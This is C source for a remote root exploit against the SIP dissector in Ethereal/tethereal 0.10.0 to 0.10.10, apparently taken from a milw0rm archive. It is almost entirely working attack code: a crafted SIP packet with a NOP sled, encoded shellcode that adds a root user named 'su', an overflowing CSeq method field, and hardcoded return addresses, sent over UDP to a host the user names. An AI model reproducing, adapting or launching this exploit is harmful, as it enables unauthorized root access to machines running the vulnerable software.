File size: 6,115 Bytes

497f2f3

/* tethereal_sip.c (now quite functional)

*

* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit

*

* Advisory: 

* http://www.ethereal.com/appnotes/enpa-sa-00019.html

* 

* produced by Team W00dp3ck3r:

* frauk\x41iser

* mag00n

* s00n

* thorben

* 

* Notes:

* tested on Debian Sarge 

* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux

*

* tested version of ethereal:

* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz

* (./configure, make, make install ;))

* 

* victim has to switch from normal user to root using "su -" 

* the exploit adds a user named "su" with password "su" on the victim host

* 

*/





#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netdb.h>

#include <netinet/in.h>





unsigned char sip_header[] = 

"\x4f\x50\x54\x49\x4f\x4e\x53\x20\x73\x69\x70\x3a\x68\x61\x63"

"\x6b\x20\x53\x49\x50\x2f\x32\x2e\x30\x0a\x56\x69\x61\x3a\x20"

"\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x63\x70\x63"

"\x31\x2d\x6d\x61\x72\x73\x31\x2d\x33\x2d\x30\x2d\x63\x75\x73"

"\x74\x32\x32\x35\x2e\x6d\x69\x64\x64\x2e\x63\x61\x62\x6c\x65"

"\x2e\x6e\x74\x6c\x2e\x63\x6f\x6d\x3a\x35\x35\x31\x31\x38\x3b"

"\x72\x70\x6f\x72\x74\x0d\x0a\x56\x69\x61\x3a\x20\x53\x49\x50"

"\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x68\x61\x63\x6b\x3a\x39"

"\x0a\x46\x72\x6f\x6d\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b"

"\x3b\x74\x61\x67\x3d\x36\x31\x35\x61\x65\x37\x37\x30\x0a\x54"

"\x6f\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b";



unsigned char callid[] =

"\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20";





/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into 

2 parts because one buffer was too small. thx to http://metasploit.com */

unsigned char shellcode[] =

"\x31\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"

"\xb7\x95\xbb\x83\xeb\xfc\xe2\xf4\x94\x7e\x1c\x70\xcf\xf1\xcd\x76"

"\x25\xdd\x90\xe3\x94\x7e\xc4\xd3\xd6\xc4\xe2\xdf\xcd\x98\xba\xcb"

"\xc4\xdf\xba\xde\xd1\xd4\x1c\x58\xe4\x02\x91\x76\x25\x24\x7d\x9b"

"\xa5\xb7\x95\xc8\xd0\x8d\xd4\xfa\xdf\xf2\xac\xd4\xd4\xf9\xdd\xed"

"\xf5\x82\xe6\x81\x95\x8d\xa5\x81\x9f\x98\xaf\x94\xc7\xde\xfb\x94"

"\xd6\xdf\x9f\xe2\x2e\xe6";





unsigned char cseq[] = 

"\x0a\x43\x53\x65\x71\x3a\x20";



/* the malformed cseq method field. the buffer has a size of 16 byte. you need 

48 byte to overwrite the return address. the first byte is checked isalpha(), 

so we splitted the shellcode in a way that the first char of cseq_method passes

the isalpha() check. */ 

unsigned char cseq_method[] = 

"\x69\xd1\xa1\xef\x58\x3b\xcf\xb6\xcd\x76\x25\xb7\x95\xbb";





/* needed to be a fully valid sip packet */

unsigned char sip_footer[] =

"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x61\x63\x6b\x3a"

"\x39\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74"

"\x68\x3a\x20\x30\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72"

"\x64\x73\x3a\x20\x37\x30\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"

"\x6e\x74\x3a\x20\x57\x30\x30\x64\x70\x33\x63\x6b\x33\x72\x20"

"\x0a";







int main(int argc, char * argv[]) {

unsigned int i, offset, ret, p_addr;

struct sockaddr_in dest;

struct hostent *he;

int sock, slen = sizeof(struct sockaddr);

unsigned char buffer[2048];



// help output

if(argc < 3) {

printf("correct syntax: %s <flag> <host> \n", argv[0]);

printf("possible flag: \n");

printf("1 the ethereal user has started tethereal" 

"with full path as root \n");

printf("2 the ethereal user has started tethereal" 

"without directorypath as root \n");

return 1;

}



// p_addr may differ on other systems ;)

if (argv[1][0] == '1') {

p_addr = 0xbffee328;

}



if (argv[1][0] == '2') {

p_addr = 0xbffee338;

}



// destination-ip check

if((he = gethostbyname(argv[2])) == NULL) {

printf("[!] Couldn't resolve %s\n", argv[2]);

return 1;

}



// open socket

if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {

perror("socket()");

return 1;

}



// set packet parameters

dest.sin_port = htons(5060);

dest.sin_family = AF_INET;

dest.sin_addr = *((struct in_addr *)he->h_addr);



// set the returnaddress (may differ on other systems)

ret = 0xbffee240; 





//// generate a buffer containing the data ////

offset = 0;



// set all values of the buffer to 0x0

memset(buffer, 0x0, sizeof(buffer));



// copy the header into the buffer

memcpy(buffer+offset, sip_header, sizeof(sip_header)); 

offset += sizeof(sip_header) -1;



// concat the callid into the buffer

memcpy(buffer+offset, callid, sizeof(callid)); 

offset += sizeof(callid) -1;



// add the callid-value (nop+shellcode)

i = 128 - sizeof(shellcode) +1; 

memset(buffer+offset, 0x90, i);

offset += i;



// insert shellcode into buffer

memcpy(buffer+offset, shellcode, sizeof(shellcode));

offset += sizeof(shellcode) -1; 





// concat the cseq

memcpy(buffer+offset, cseq, sizeof(cseq)); 

offset += sizeof(cseq) -1;



// generate the part, which causes the overflow (=cseq-method)

memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 

offset += sizeof(cseq_method) -1; 



// fill the rest of cseq_method with A

memset(buffer+offset, 0x41, 30);

offset += 30; 

// write return address

*(long *)&buffer[offset] = ret; 

offset += 4;



// repair the first pointer after ret- address

*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1

offset += 4;

// repair second pointer after ret- address 

*(long *)&buffer[offset] = p_addr;

offset += 4; 



// the finalising part of the message

memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 



// send the buffer to the victim

if (sendto(sock, buffer, sizeof(buffer), 0, 

(struct sockaddr *)&dest, slen)== -1) {

printf("[!] Error sending packet!\n");

return 1;

}



// DEBUG //

// printf("%s\n", buffer);



printf("[*] dark W00dp3ck3r packet sent!\n");

close(sock);

return 0;



}



// milw0rm.com [2005-05-31]